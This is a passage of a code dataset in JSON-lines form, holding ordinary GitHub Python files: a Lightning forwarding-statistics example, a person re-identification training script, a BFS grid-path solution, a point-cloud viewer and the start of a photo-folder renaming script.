times.append(datetime.datetime.fromtimestamp(f['timestamp']))\n amounts.append(f['amt_in'])\n\n plt.xticks(rotation=45)\n plt.scatter(times, amounts, s=2)\n plt.yscale('log')\n plt.ylabel('Forwarding amount [sat]')\n plt.show()\n\n\ndef plot_fees(forwarding_events):\n \"\"\"\n Plots forwarding fees and effective fee rate in color code.\n\n :param forwarding_events:\n \"\"\"\n times = []\n amounts = []\n color = []\n for f in forwarding_events:\n times.append(datetime.datetime.fromtimestamp(f['timestamp']))\n amounts.append(f['fee_msat'])\n color.append(f['effective_fee'])\n plt.xticks(rotation=45)\n plt.scatter(times, amounts, c=color, norm=colors.LogNorm(vmin=1E-6, vmax=1E-3), s=2)\n plt.yscale('log')\n plt.ylabel('Fees [msat]')\n plt.ylim((0.5, 1E+6))\n plt.colorbar(label='effective feerate (base + rate)')\n plt.show()\n\n\ndef statistics_forwardings(forwarding_events):\n \"\"\"\n Calculates and prints some statistics of forwarding events.\n\n :param forwarding_events:\n \"\"\"\n total_amount = 0\n total_fees = 0\n transactions = 0\n fee_rate = 0\n channels_out = {}\n channels_in = {}\n\n for f in forwarding_events:\n 
if f['chan_id_in'] not in channels_in:\n            channels_in[f['chan_id_in']] = 0\n        if f['chan_id_out'] not in channels_out:\n            channels_out[f['chan_id_out']] = 0\n\n        channels_out[f['chan_id_out']] += f['amt_in']\n        channels_in[f['chan_id_in']] += f['amt_in']\n\n        total_amount += f['amt_in']\n        total_fees += f['fee_msat']\n        transactions += 1\n        fee_rate += f['effective_fee']\n\n    fee_rate /= transactions\n    print(\"-------- Forwarding statistics --------\")\n    print(\"Number of forwardings: {}\".format(transactions))\n    print(\"Total forwardings [sat]: {}\".format(total_amount))\n    print(\"Total fees earned [sat]: {:.3f}\".format(total_fees / 1000.))\n    print(\"Average fee rate: {:.6f}\".format(fee_rate))\n\n    print(\"-------- Popular channels --------\")\n    print(\"Popular channels out:\")\n    for w in sorted(channels_out, key=channels_out.get, reverse=True)[:10]:\n        print(w, channels_out[w])\n    print(\"Popular channels in:\")\n    for w in sorted(channels_in, key=channels_in.get, reverse=True)[:10]:\n        print(w, channels_in[w])\n\n\nif __name__ == '__main__':\n    node = LndNode()\n    forwardings = node.get_forwarding_events()\n\n    # plot_forwardings(forwardings)\n    # plot_fees(forwardings)\n    statistics_forwardings(forwardings)\n","repo_name":"bitromortac/lndmanage","sub_path":"examples/example_fwding_summary.py","file_name":"example_fwding_summary.py","file_ext":"py","file_size_in_byte":2854,"program_lang":"python","lang":"en","doc_type":"code","stars":169,"dataset":"github-code","pt":"5"} +{"seq_id":"73164146393","text":"from __future__ import print_function\nimport argparse\nimport sys\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nimport torchvision\nimport torch.nn.functional as F\nimport torchvision.transforms as transforms\nfrom data_loader import SYSUData, TestData\nfrom data_manager import *\nfrom eval_metrics import eval_sysu\nfrom model_bn import embed_net\nfrom utils import *\nimport copy\nfrom loss import OriTripletLoss, TripletLoss_WRT, TripletLoss_ADP, sce, shape_cpmt_cross_modal_ce\n# from tensorboardX import SummaryWriter\nfrom ChannelAug import ChannelAdap, ChannelAdapGray, ChannelRandomErasing\nimport pdb\nimport wandb\n\nparser = argparse.ArgumentParser(description='PyTorch Cross-Modality Training')\nparser.add_argument('--dataset', default='sysu', help='dataset name: regdb or sysu')\nparser.add_argument('--lr', default=0.1, type=float, help='learning rate, 0.00035 for adam')\nparser.add_argument('--optim', default='sgd', type=str, help='optimizer')\nparser.add_argument('--arch', default='resnet50', type=str,\n                    help='network baseline: resnet18 or resnet50')\nparser.add_argument('--resume', '-r', default='', type=str,\n                    help='resume from checkpoint')\nparser.add_argument('--test-only', action='store_true', help='test only')\nparser.add_argument('--model_path', default='save_model/', type=str,\n                    help='model save path')\nparser.add_argument('--save_epoch', default=20, type=int,\n                    metavar='s', help='save model every 10 epochs')\nparser.add_argument('--log_path', default='log/', type=str,\n                    help='log save path')\nparser.add_argument('--vis_log_path', default='log/vis_log/', type=str,\n                    help='log save path')\nparser.add_argument('--workers', default=8, type=int, metavar='N',\n                    help='number of data loading workers (default: 4)')\nparser.add_argument('--img_w', default=144, type=int,\n                    metavar='imgw', help='img width')\nparser.add_argument('--img_h', 
default=288, type=int,\n metavar='imgh', help='img height')\nparser.add_argument('--batch-size', default=8, type=int,\n metavar='B', help='training batch size')\nparser.add_argument('--test-batch', default=64, type=int,\n metavar='tb', help='testing batch size')\nparser.add_argument('--method', default='agw', type=str,\n metavar='m', help='method type: base or agw, adp')\nparser.add_argument('--margin', default=0.3, type=float,\n metavar='margin', help='triplet loss margin')\nparser.add_argument('--num_pos', default=4, type=int,\n help='num of pos per identity in each modality')\nparser.add_argument('--trial', default=1, type=int,\n metavar='t', help='trial (only for RegDB dataset)')\nparser.add_argument('--seed', default=3, type=int,\n metavar='t', help='random seed')\nparser.add_argument('--gpu', default='0', type=str,\n help='gpu device ids for CUDA_VISIBLE_DEVICES')\nparser.add_argument('--mode', default='all', type=str, help='all or indoor')\n\nparser.add_argument('--date', default='12.22', help='date of exp')\n\nparser.add_argument('--gradclip', default= 11, type=float,\n metavar='gradclip', help='gradient clip')\nparser.add_argument('--gpuversion', default= '3090', type=str, help='3090 or 4090')\npath_dict = {}\npath_dict['3090'] = ['/home/share/reid_dataset/SYSU-MM01/', '/home/share/fengjw/SYSU_MM01_SHAPE/']\npath_dict['4090'] = ['/home/jiawei/data/SYSU-MM01/', '/home/jiawei/data/SYSU_MM01_SHAPE/']\nargs = parser.parse_args()\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\nwandb.init(config=args, project='rgbir-reid2')\nargs.method = args.method + \"_gradclip\" + str(args.gradclip) + \"_seed\" + str(args.seed)\nwandb.run.name = args.method\n# set_seed(args.seed)\n\ndataset = args.dataset\nif dataset == 'sysu':\n log_path = args.log_path + 'sysu_log/'\n test_mode = [1, 2] # thermal to visible\n\n\ncheckpoint_path = args.model_path\n\nif not os.path.isdir(log_path):\n os.makedirs(log_path)\nif not os.path.isdir(checkpoint_path):\n os.makedirs(checkpoint_path)\nif not os.path.isdir(args.vis_log_path):\n os.makedirs(args.vis_log_path)\n\nsuffix = dataset\n# if args.method == 'adp':\n# suffix = suffix + '_{}_joint_co_nog_ch_nog_sq{}'.format(args.method, args.square)\n# else:\nsuffix = suffix + '_{}'.format(args.method)\n \nsuffix = suffix + '_p{}_n{}_lr_{}'.format( args.num_pos, args.batch_size, args.lr) \n\nif not args.optim == 'sgd':\n suffix = suffix + '_' + args.optim\n\n\nsys.stdout = Logger(log_path + args.date + '/' + suffix + '_os.txt')\n\nvis_log_dir = args.vis_log_path + args.date + '/' + suffix + '/'\n\nif not os.path.isdir(vis_log_dir):\n os.makedirs(vis_log_dir)\n# writer = SummaryWriter(vis_log_dir)\nprint(\"==========\\nArgs:{}\\n==========\".format(args))\ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nbest_acc = 0 # best test accuracy\nbest_acc_ema = 0 # best test accuracy\nstart_epoch = 0\n\nprint('==> Loading data..')\n# Data loading code\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225])\ntransform_train_list = [\n transforms.ToPILImage(),\n transforms.Pad(10),\n transforms.RandomCrop((args.img_h, args.img_w)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize]\n \ntransform_test = transforms.Compose( [\n transforms.ToPILImage(),\n transforms.Resize((args.img_h, args.img_w)),\n transforms.ToTensor(),\n normalize])\n\n\ntransform_train = transforms.Compose( transform_train_list )\n\nend = time.time()\nif dataset == 'sysu':\n # training set\n trainset = 
SYSUData(data_dir=path_dict[args.gpuversion][0],data_dir1=path_dict[args.gpuversion][1])\n # generate the idx of each person identity\n color_pos, thermal_pos = GenIdx(trainset.train_color_label, trainset.train_thermal_label)\n\n # testing set\n query_img, query_label, query_cam = process_query_sysu(mode=args.mode,data_path_ori=path_dict[args.gpuversion][0])\n # gall_img, gall_label, gall_cam = process_gallery_sysu_all(mode=args.mode,data_path_ori=path_dict[args.gpuversion][0])\n gall_img, gall_label, gall_cam = process_gallery_sysu(mode=args.mode, trial=0, data_path_ori=path_dict[args.gpuversion][0]) \n\nset_seed(args.seed)\n\n\n\ngallset = TestData(gall_img, gall_label, gall_cam, transform=transform_test, img_size=(args.img_w, args.img_h))\nqueryset = TestData(query_img, query_label, query_cam, transform=transform_test, img_size=(args.img_w, args.img_h))\n\n# testing data loader\ngall_loader = data.DataLoader(gallset, batch_size=args.test_batch, shuffle=False, num_workers=args.workers)\nquery_loader = data.DataLoader(queryset, batch_size=args.test_batch, shuffle=False, num_workers=args.workers)\n\nn_class = len(np.unique(trainset.train_color_label))\nnquery = len(query_label)\nngall = len(gall_label)\n\nprint('Dataset {} statistics:'.format(dataset))\nprint(' ------------------------------')\nprint(' subset | # ids | # images')\nprint(' ------------------------------')\nprint(' visible | {:5d} | {:8d}'.format(n_class, len(trainset.train_color_label)))\nprint(' thermal | {:5d} | {:8d}'.format(n_class, len(trainset.train_thermal_label)))\nprint(' ------------------------------')\nprint(' query | {:5d} | {:8d}'.format(len(np.unique(query_label)), nquery))\nprint(' gallery | {:5d} | {:8d}'.format(len(np.unique(gall_label)), ngall))\nprint(' ------------------------------')\nprint('Data Loading Time:\\t {:.3f}'.format(time.time() - end))\n\nprint('==> Building model..', args.method)\n\nnet = embed_net(n_class, no_local= 'off', gm_pool = 'on', arch=args.arch)\nnet_ema = embed_net(n_class, no_local= 'off', gm_pool = 'on', arch=args.arch)\nprint('use model without nonlocal but gmpool')\n\nnet.to(device)\nnet_ema.to(device)\n# cudnn.benchmark = True\n\nif len(args.resume) > 0:\n model_path = checkpoint_path + args.resume\n if os.path.isfile(model_path):\n print('==> loading checkpoint {}'.format(args.resume))\n checkpoint = torch.load(model_path)\n start_epoch = checkpoint['epoch']\n net.load_state_dict(checkpoint['net'])\n print('==> loaded checkpoint {} (epoch {})'\n .format(args.resume, checkpoint['epoch']))\n else:\n print('==> no checkpoint found at {}'.format(args.resume))\n\n# define loss function\ncriterion_id = nn.CrossEntropyLoss()\nif 'agw' in args.method:\n criterion_tri = TripletLoss_WRT()\nelse:\n loader_batch = args.batch_size * args.num_pos\n criterion_tri= OriTripletLoss(batch_size=loader_batch, margin=args.margin)\ncriterion_id.to(device)\ncriterion_tri.to(device)\nif args.optim == 'sgd':\n ignored_params = list(map(id, net.classifier.parameters()))\n ignored_params += list(map(id, net.bottleneck.parameters()))\n ignored_params += list(map(id, net.bottleneck_ir.parameters()))\n ignored_params += list(map(id, net.classifier_ir.parameters())) \n if hasattr(net,'classifier_shape'):\n ignored_params += list(map(id, net.classifier_shape.parameters())) \n ignored_params += list(map(id, net.bottleneck_shape.parameters())) \n \n ignored_params += list(map(id, net.projs.parameters())) \n print('#####larger lr for shape#####')\n\n base_params = filter(lambda p: id(p) not in 
ignored_params, net.parameters())\n params = [{'params': base_params, 'lr': 0.1 * args.lr}, {'params': net.classifier.parameters(), 'lr': args.lr},]\n \n params.append({'params': net.bottleneck.parameters(), 'lr': args.lr})\n params.append({'params': net.bottleneck_shape.parameters(), 'lr': args.lr})\n params.append({'params': net.classifier_ir.parameters(), 'lr': args.lr})\n params.append({'params': net.classifier_shape.parameters(), 'lr': args.lr})\n params.append({'params': net.projs.parameters(), 'lr': args.lr})\n params.append({'params': net.bottleneck_ir.parameters(), 'lr': args.lr})\n\n # optimizer = optim.Adam(params, weight_decay=5e-4)\n optimizer = optim.SGD(params, weight_decay=5e-4, momentum=0.9, nesterov=True)\n\n\ndef adjust_learning_rate(optimizer, epoch):\n \"\"\"Sets the learning rate to the initial LR decayed by 10 every 30 epochs\"\"\"\n\n ema_w = 1000\n if epoch < 10:\n lr = args.lr * (epoch + 1) / 10\n elif epoch >= 10 and epoch < 20:\n lr = args.lr\n elif epoch >= 20 and epoch < 85:\n lr = args.lr * 0.1\n ema_w = 10000\n elif epoch < 120:\n lr = args.lr * 0.01\n ema_w = 100000\n optimizer.param_groups[0]['lr'] = 0.1*lr\n for i in range(len(optimizer.param_groups) - 1):\n optimizer.param_groups[i + 1]['lr'] = lr\n\n return lr, ema_w\n\n\ndef update_ema_variables(net, net_ema, alpha, global_step=None):\n with torch.no_grad():\n for ema_item, new_item in zip(net_ema.named_parameters(), net.named_parameters()):\n ema_key, ema_param = ema_item\n new_key, new_param = new_item\n if 'classifier' in ema_key or 'bottleneck' in ema_key or 'projs' in ema_key:\n alpha_now = alpha*2\n else:\n alpha_now = alpha\n mygrad = new_param.data - ema_param.data\n ema_param.data.add_(mygrad, alpha=alpha_now)\n\ndef rand_bbox(size, lam):\n W = size[2]\n H = size[3]\n cut_rat = np.sqrt(1. 
- lam)\n cut_w = int(W * cut_rat)\n cut_h = int(H * cut_rat)\n\n # uniform\n cx = np.random.randint(W)\n cy = np.random.randint(H)\n\n bbx1 = np.clip(cx - cut_w // 2, 0, W)\n bby1 = np.clip(cy - cut_h // 2, 0, H)\n bbx2 = np.clip(cx + cut_w // 2, 0, W)\n bby2 = np.clip(cy + cut_h // 2, 0, H)\n\n return bbx1, bby1, bbx2, bby2\n\ndef train(epoch):\n\n current_lr, ema_w = adjust_learning_rate(optimizer, epoch)\n print('current lr', current_lr)\n train_loss = AverageMeter()\n id_loss = AverageMeter()\n id_loss_shape = AverageMeter()\n id_loss_shape2 = AverageMeter()\n mutual_loss = AverageMeter()\n mutual_loss2 = AverageMeter()\n kl_loss = AverageMeter()\n data_time = AverageMeter()\n batch_time = AverageMeter()\n correct = 0\n total = 0\n\n # switch to train mode\n net.train()\n net_ema.train()\n end = time.time()\n for batch_idx, (inputs) in enumerate(trainloader):\n x1, x1_shape, x2, x2_shape, y1, y2 = inputs\n y = torch.cat((y1, y2), 0)\n x1, x1_shape, x2, x2_shape, y1, y2, y = x1.cuda(), x1_shape.cuda(), x2.cuda(), x2_shape.cuda(), y1.cuda(), y2.cuda(), y.cuda()\n \n data_time.update(time.time() - end)\n\n cutmix_prob = np.random.rand(1)\n if cutmix_prob < 0.2:\n # generate mixed sample\n x = torch.cat((x1, x2), 0)\n x_shape = torch.cat((x1_shape, x2_shape), 0)\n lam = np.random.beta(1, 1)\n bbx1, bby1, bbx2, bby2 = rand_bbox(x.size(), lam)\n\n rand_index = torch.randperm(y1.size()[0]).cuda()\n target_a = y\n target_b = torch.cat((y2[rand_index],y1[rand_index]), 0)\n x[:, :, bbx1:bbx2, bby1:bby2] = torch.cat((x2[rand_index, :, bbx1:bbx2, bby1:bby2],x1[rand_index, :, bbx1:bbx2, bby1:bby2]),0)\n x_shape[:, :, bbx1:bbx2, bby1:bby2] = torch.cat((x2_shape[rand_index, :, bbx1:bbx2, bby1:bby2],x1_shape[rand_index, :, bbx1:bbx2, bby1:bby2]),0)\n\n # adjust lambda to exactly match pixel ratio\n lam = 1 - ((bbx2 - bbx1) * (bby2 - bby1) / (x.size()[-1] * x.size()[-2]))\n # compute output\n outputs = net(x[:y1.shape[0]], x[y1.shape[0]:], x_shape[:y1.shape[0]], x_shape[y1.shape[0]:])\n with torch.no_grad():\n outputs_ema = net_ema(x[:y1.shape[0]], x[y1.shape[0]:], x_shape[:y1.shape[0]], x_shape[y1.shape[0]:])\n \n loss_id = criterion_id(outputs['rgbir']['logit'], target_a) * lam + criterion_id(outputs['rgbir']['logit'], target_b) * (1. - lam)\n loss_id2 = torch.tensor([0]).cuda()\n loss_id_shape = criterion_id(outputs['shape']['logit'], target_a) * lam + criterion_id(outputs['shape']['logit'], target_b) * (1. 
- lam)\n            loss_tri = torch.tensor([0]).cuda() \n            loss_kl_rgbir = sce(outputs['rgbir']['logit'][:x1.shape[0]],outputs['rgbir']['logit'][x1.shape[0]:])+sce(outputs['rgbir']['logit'][x1.shape[0]:],outputs['rgbir']['logit'][:x1.shape[0]])\n            w1 = torch.tensor([1.]).cuda()\n            loss_estimate = torch.tensor([0]).cuda()\n            w2 = torch.tensor([1.]).cuda()\n            loss_kl_rgbir2 = torch.tensor([0]).cuda()\n\n        else:\n            with torch.no_grad():\n                outputs_ema = net_ema(x1, x2, x1_shape, x2_shape)\n            outputs = net(x1, x2, x1_shape, x2_shape)\n\n            # id loss\n            # if epoch < 40:\n            loss_id = criterion_id(outputs['rgbir']['logit'], y)\n            loss_id2 = criterion_id(outputs['rgbir']['logit2'], y)\n            loss_id_shape = criterion_id(outputs['shape']['logit'], y)\n\n            # triplet loss\n            loss_tri, batch_acc = criterion_tri(outputs['rgbir']['bef'], y)\n            \n            # cross modal distill\n            loss_kl_rgbir = sce(outputs['rgbir']['logit'][:x1.shape[0]],outputs['rgbir']['logit'][x1.shape[0]:])+sce(outputs['rgbir']['logit'][x1.shape[0]:],outputs['rgbir']['logit'][:x1.shape[0]])\n            # shape complementary\n            loss_kl_rgbir2 = shape_cpmt_cross_modal_ce(x1, y1, outputs)\n\n            # shape consistent \n            loss_estimate = ((outputs['rgbir']['zp']-outputs_ema['shape']['zp'].detach()) ** 2).mean(1).mean() + sce(torch.mm(outputs['rgbir']['zp'], net.classifier_shape.weight.data.detach().t()), outputs_ema['shape']['logit'])\n            \n\n            ############## reweighting ###############\n            compliment_grad = torch.autograd.grad(loss_id2+loss_kl_rgbir2, outputs['rgbir']['bef'], retain_graph=True)[0]\n            consistent_grad = torch.autograd.grad(loss_estimate, outputs['rgbir']['bef'], retain_graph=True)[0]\n\n            with torch.no_grad():\n                compliment_grad_norm = (compliment_grad.norm(p=2,dim=-1)).mean()\n                consistent_grad_norm = (consistent_grad.norm(p=2,dim=-1)).mean()\n                w1 = consistent_grad_norm / (compliment_grad_norm+consistent_grad_norm) * 2\n                w2 = compliment_grad_norm / (compliment_grad_norm+consistent_grad_norm) * 2 \n\n            ############## orthogonalize loss ###############\n            proj_inner = torch.mm(F.normalize(net.projs[0], 2, 0).t(), F.normalize(net.projs[0], 2, 0))\n            eye_label = torch.eye(net.projs[0].shape[1],device=device)\n            loss_ortho = (proj_inner - eye_label).abs().sum(1).mean()\n\n\n\n        loss = loss_id + loss_tri + loss_id_shape + loss_kl_rgbir + w1*loss_estimate + w2*loss_id2 +w2*loss_kl_rgbir2 + loss_ortho\n\n        if not check_loss(loss):\n            import pdb\n            pdb.set_trace()\n        optimizer.zero_grad()\n        loss.backward()\n        torch.nn.utils.clip_grad_norm_(net.parameters(), args.gradclip)\n        optimizer.step()\n        \n\n        update_ema_variables(net, net_ema, 1/ema_w)\n\n\n        # update P\n        train_loss.update(loss_id2.item(), 2 * x1.size(0))\n        id_loss.update(loss_id.item(), 2 * x1.size(0))\n        id_loss_shape.update(loss_id_shape.item(), 2 * x1.size(0))\n        id_loss_shape2.update(w1.item(), 2 * x1.size(0))\n        mutual_loss2.update(loss_kl_rgbir2.item(), 2 * x1.size(0))\n        mutual_loss.update(loss_ortho.item(), 2 * x1.size(0))\n        # kl_loss.update(loss_kl2.item()+loss_kl.item() , 2 * x1.size(0))\n        kl_loss.update(loss_estimate.item(), 2 * x1.size(0))\n        total += y.size(0)\n\n        # measure elapsed time\n        batch_time.update(time.time() - end)\n        end = time.time()\n        if batch_idx % 50 == 0:\n            # import pdb\n            # pdb.set_trace()\n            print('Epoch:[{}][{}/{}]'\n                  'L:{id_loss.val:.4f}({id_loss.avg:.4f}) '\n                  'L2:{train_loss.val:.4f}({train_loss.avg:.4f}) '\n                  'sL:{id_loss_shape.val:.4f}({id_loss_shape.avg:.4f}) '\n                  'w1:{id_loss_shape2.val:.4f}({id_loss_shape2.avg:.4f}) '\n                  'or:{mutual_loss.val:.4f}({mutual_loss.avg:.4f}) '\n                  'ML2:{mutual_loss2.val:.4f}({mutual_loss2.avg:.4f}) '\n                  'KL:{kl_loss.val:.4f}({kl_loss.avg:.4f}) '.format(\n                epoch, batch_idx, len(trainloader),\n                train_loss=train_loss, id_loss=id_loss, id_loss_shape=id_loss_shape, id_loss_shape2=id_loss_shape2, mutual_loss=mutual_loss, mutual_loss2=mutual_loss2, kl_loss=kl_loss))\n\n\ndef test(net):\n    pool_dim = 2048\n    def fliplr(img):\n        '''flip horizontal'''\n        inv_idx = torch.arange(img.size(3)-1,-1,-1,device=img.device).long()  # N x C x H x W\n        img_flip = img.index_select(3,inv_idx)\n        return img_flip\n    def extract_gall_feat(gall_loader):\n        net.eval()\n        print ('Extracting Gallery Feature...')\n        start = time.time()\n        ptr = 0\n        ngall = len(gall_loader.dataset)\n        gall_feat_pool = np.zeros((ngall, pool_dim))\n        gall_feat_fc = np.zeros((ngall, pool_dim))\n        with torch.no_grad():\n            for batch_idx, (input, label, cam) in enumerate(gall_loader):\n                batch_num = input.size(0)\n                input = Variable(input.cuda())\n                feat_pool, feat_fc = net(input, input, mode=test_mode[0])\n                input2 = fliplr(input)\n                feat_pool2, feat_fc2 = net(input2, input2, mode=test_mode[0])\n                feat_pool = (feat_pool+feat_pool2)/2\n                feat_fc = (feat_fc+feat_fc2)/2\n\n                gall_feat_pool[ptr:ptr+batch_num,: ] = feat_pool.detach().cpu().numpy()\n                gall_feat_fc[ptr:ptr+batch_num,: ] = feat_fc.detach().cpu().numpy()\n                ptr = ptr + batch_num\n        print('Extracting Time:\\t {:.3f}'.format(time.time()-start))\n        return gall_feat_pool, gall_feat_fc\n    \n    def extract_query_feat(query_loader):\n        net.eval()\n        print ('Extracting Query Feature...')\n        start = time.time()\n        ptr = 0\n        nquery = len(query_loader.dataset)\n        query_feat_pool = np.zeros((nquery, pool_dim))\n        query_feat_fc = np.zeros((nquery, pool_dim))\n        with torch.no_grad():\n            for batch_idx, (input, label, cam) in enumerate(query_loader):\n                batch_num = input.size(0)\n                input = Variable(input.cuda())\n                feat_pool, feat_fc = net(input, input, mode=test_mode[1])\n                input2 = fliplr(input)\n                feat_pool2, feat_fc2 = net(input2, input2, mode=test_mode[1])\n                feat_pool = (feat_pool+feat_pool2)/2\n                feat_fc = (feat_fc+feat_fc2)/2\n                query_feat_pool[ptr:ptr+batch_num,: ] = feat_pool.detach().cpu().numpy()\n                query_feat_fc[ptr:ptr+batch_num,: ] = feat_fc.detach().cpu().numpy()\n                ptr = ptr + batch_num \n        print('Extracting Time:\\t {:.3f}'.format(time.time()-start))\n        return query_feat_pool, query_feat_fc\n    # switch to evaluation mode\n    net.eval()\n    query_feat_pool, query_feat_fc = extract_query_feat(query_loader)\n\n    # gall_img, gall_label, gall_cam = process_gallery_sysu(mode=args.mode, trial=0)\n\n    trial_gallset = TestData(gall_img, gall_label, gall_cam, transform=transform_test, img_size=(args.img_w, args.img_h))\n    trial_gall_loader = data.DataLoader(trial_gallset, batch_size=args.test_batch, shuffle=False, num_workers=4)\n\n    gall_feat_pool, gall_feat_fc = extract_gall_feat(trial_gall_loader)\n\n    # pool5 feature\n    distmat_pool = np.matmul(query_feat_pool, np.transpose(gall_feat_pool))\n    cmc_pool, mAP_pool, mINP_pool = eval_sysu(-distmat_pool, query_label, gall_label, query_cam, gall_cam)\n\n    # fc feature\n    distmat = np.matmul(query_feat_fc, 
np.transpose(gall_feat_fc))\n cmc, mAP, mINP = eval_sysu(-distmat, query_label, gall_label, query_cam, gall_cam)\n all_cmc = cmc\n all_mAP = mAP\n all_mINP = mINP\n all_cmc_pool = cmc_pool\n all_mAP_pool = mAP_pool\n all_mINP_pool = mINP_pool\n return all_cmc, all_mAP \n\n\n\ndef seed_worker(worker_id):\n worker_seed = torch.initial_seed() % 2**32\n np.random.seed(worker_seed)\n random.seed(worker_seed)\n\n# training\nprint('==> Start Training...')\nfor epoch in range(start_epoch, 120 - start_epoch):\n\n print('==> Preparing Data Loader...')\n # identity sampler\n sampler = IdentitySampler(trainset.train_color_label, \\\n trainset.train_thermal_label, color_pos, thermal_pos, args.num_pos, args.batch_size,\n epoch)\n\n trainset.cIndex = sampler.index1 # color index\n trainset.tIndex = sampler.index2 # thermal index\n print(epoch)\n # print(trainset.cIndex)\n # print(trainset.tIndex)\n\n loader_batch = args.batch_size * args.num_pos\n\n trainloader = data.DataLoader(trainset, batch_size=loader_batch, \\\n sampler=sampler, num_workers=args.workers, drop_last=True)\n\n # training\n\n if epoch == 0:\n net_ema.load_state_dict(net.state_dict())\n print('init ema modal')\n\n\n train(epoch)\n\n print('Test Epoch: {}'.format(epoch))\n\n # testing\n cmc, mAP = test(net)\n wandb.log({'rank1': cmc[0],\n 'mAP': mAP,\n },step=epoch)\n cmc_ema, mAP_ema = test(net_ema)\n wandb.log({'rank1_ema': cmc_ema[0],\n 'mAP_ema': mAP_ema,\n },step=epoch)\n # save model\n if cmc[0] > best_acc: \n best_acc = cmc[0]\n best_epoch = epoch\n state = {\n 'net': net.state_dict(),\n 'cmc': cmc,\n 'mAP': mAP,\n 'epoch': epoch,\n }\n torch.save(state, checkpoint_path + suffix + '_best.t')\n if cmc_ema[0] > best_acc_ema: \n best_acc_ema = cmc_ema[0]\n best_epoch_ema = epoch\n state = {\n 'net': net_ema.state_dict(),\n 'cmc': cmc_ema,\n 'mAP': mAP_ema,\n 'epoch': epoch,\n }\n torch.save(state, checkpoint_path + suffix + '_ema_best.t')\n if epoch % 5 == 0:\n state = {\n 'net': net_ema.state_dict(),\n }\n torch.save(state, checkpoint_path + suffix + '_' + str(epoch) + '_.t')\n\n print('Rank-1: {:.2%} | Rank-5: {:.2%} | Rank-10: {:.2%}| Rank-20: {:.2%}| mAP: {:.2%}'.format(\n cmc[0], cmc[4], cmc[9], cmc[19], mAP))\n print('Best Epoch [{}]'.format(best_epoch))\n \n print('------------------ema eval------------------')\n print('Rank-1: {:.2%} | Rank-5: {:.2%} | Rank-10: {:.2%}| Rank-20: {:.2%}| mAP: {:.2%}'.format(\n cmc_ema[0], cmc_ema[4], cmc_ema[9], cmc_ema[19], mAP_ema))\n print('Best Epoch [{}]'.format(best_epoch_ema))\n","repo_name":"jiawei151/SGIEL_VIReID","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":24882,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"5"} +{"seq_id":"1252874188","text":"from collections import deque\nT = int(input())\nfor t in range(1, T+1):\n N = int(input())\n arr = [list(map(int, input())) for _ in range(N)]\n acc = [[21e8]*N for _ in range(N)]\n\n q = deque()\n q.append((0,0))\n acc[0][0] = 0\n dy = [-1, 1, 0, 0]\n dx = [0, 0, -1, 1]\n\n while q:\n y, x = q.popleft()\n for i in range(4):\n ny = y + dy[i]\n nx = x + dx[i]\n if 0 <= ny < N and 0 <= nx < N:\n if acc[y][x] + arr[ny][nx] < acc[ny][nx]:\n acc[ny][nx] = acc[y][x] + arr[ny][nx]\n q.append((ny, nx))\n\n print(f'{t}', acc[-1][-1])","repo_name":"swjiae/Algorithm","sub_path":"Algorithm/SWEA/Brute_Force/보급로.py","file_name":"보급로.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} 
+{"seq_id":"21916542271","text":"import glob\nimport pandas as pd\nimport numpy as np\nimport pptk\n\ndata_path = '/Users/jchilders/randlesESP/data'\nfilelist = glob.glob(data_path + '/*combined_csv*.csv')\nprint('Found ',len(filelist), 'files')\nprint('filelist: ')\nfor i,filename in enumerate(filelist):\n print(i,'. ',filename)\n\n\ndef sub_sample(filelist):\n\n data = pd.read_csv(filelist[0])\n data = data[['1','2','3']].to_numpy()\n\n img_size = len(data)\n n_sub_imgs = 1000\n sub_img_size = int(img_size / n_sub_imgs)\n for i in range(n_sub_imgs):\n sub_img = data[i*sub_img_size:(i+1)*sub_img_size,:]\n print(' number of points: ',len(sub_img))\n v = pptk.viewer(sub_img)\n v.set(point_size=0.01)\n print('waiting...')\n v.wait()\n #input('hit enter')\n #v.()\n\ndef full_image(filelist):\n\n for filename in filelist:\n print('plotting filename: ',filename)\n data = pd.read_csv(filename)\n print(' number of points: ',len(data))\n data = data[['1','2','3']].to_numpy()\n\n v = pptk.viewer(data)\n v.set(point_size=0.001)\n print('waiting...')\n v.wait()\n\nsub_sample(filelist)","repo_name":"jtchilders/randles_esp","sub_path":"randles_visual.py","file_name":"randles_visual.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"31598368656","text":"#!/usr/bin/env python\n\nimport sys\nimport os\nimport re\nimport logging\nimport argparse\n\n\"\"\"\nauthor: cyrus (cheenpo@gmail.com)\nreason: I wrote this because exporting photos from the macOS application called \"Photos\"\n does not export them in the basic concept of folders by date :/\n\"\"\"\n\n\ndef form_folder(groups):\n \"\"\"\n take in a date tuple and form the folder name\n \"\"\"\n month = groups[0]\n day = groups[1]\n year = groups[2]\n if month in month_map:\n month = month_map[month]\n else:\n logger.error(\"month ({}) not in month_map. 
this should never happen\".format(month))\n return None\n if len(day) == 1:\n day = \"0{}\".format(day)\n return \"{}-{}-{}\".format(year, month, day)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"sanitize iPhoto moment export\")\n parser.add_argument(\"dir\", action=\"store\", help=\"directory to sanitize\")\n parser.add_argument('--debug', action='store_true', default=False)\n parser.add_argument('--test', action='store_true', default=False)\n args = parser.parse_args()\n\n logging_level = logging.INFO\n if args.debug:\n logging_level = logging.DEBUG\n logging.basicConfig(level=logging_level, stream=sys.stdout, format='%(levelname)s %(asctime)s %(message)s', datefmt='%Y-%d-%m %H:%M:%S')\n logger = logging.getLogger(__name__)\n\n file_rename_limit = 3\n month_map = {\n \"January\": \"01\",\n \"February\": \"02\",\n \"March\": \"03\",\n \"April\": \"04\",\n \"May\": \"05\",\n \"June\": \"06\",\n \"July\": \"07\",\n \"August\": \"08\",\n 